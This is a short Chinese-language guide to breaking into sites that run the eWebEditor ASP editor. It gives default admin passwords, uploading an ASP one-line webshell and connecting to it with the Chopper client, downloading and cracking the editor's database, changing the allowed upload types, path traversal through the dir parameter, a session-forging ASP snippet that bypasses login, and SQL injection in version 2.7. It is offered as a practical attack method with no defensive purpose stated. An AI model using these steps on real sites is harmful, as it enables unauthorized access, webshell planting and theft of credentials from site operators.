ewebeditor入侵手段
1.常规入侵
管理后台 ewebeditor/admin_login.asp
默认密码 admin/admin
admin/admin888
我们进入样式管理中进行设置
提交之后,我们进入样式预览,插入或修改图片
上传一句话成功之后,我们通过firebug查看图片的src属性
知道图片的上传地址,通过菜刀连接
2.如果默认用户名密码被修改了
我们可以通过下载数据库来找到用户名与密码
下载地址 ewebeditor/db/ewebeditor.mdb
我们利用辅臣数据库浏览器打开该文件
可以看到如下内容,我们可以通过cmd5将其解密
3.有可能出现以下情况,即使我们拿到了md5的加密后的值也无法破解
我们在数据库浏览器中注意到有ewebEditor_Style这张表,如果我们发现S_ImageExt允许asp上传。
那么我们可以构造如下语句
http://127.0.0.1/ewebeditor/ewebeditor.asp?id=45&style=s_exampleremote
其中45对应着S_IDstyle对应着S_NAME
4.遍历路径漏洞
进入后台之后,我们进入上传文件管理这个页面,我们在url后面补充&dir=../,甚至可以找到关键数据
5.Session欺骗绕过后台
我们将以下内容写入xx.asp
<%Session(“eWebEditor_User”) = “11111111”%>
访问该文件
然后就可以访问后台任意文件了
6.2.7版本存在以下注入
对于urlewebeditor.asp?id=14&style-standard
其中style参数过滤不严格,存在sql注入
需要手动添加检测表段
sys_UserName和sys_userpass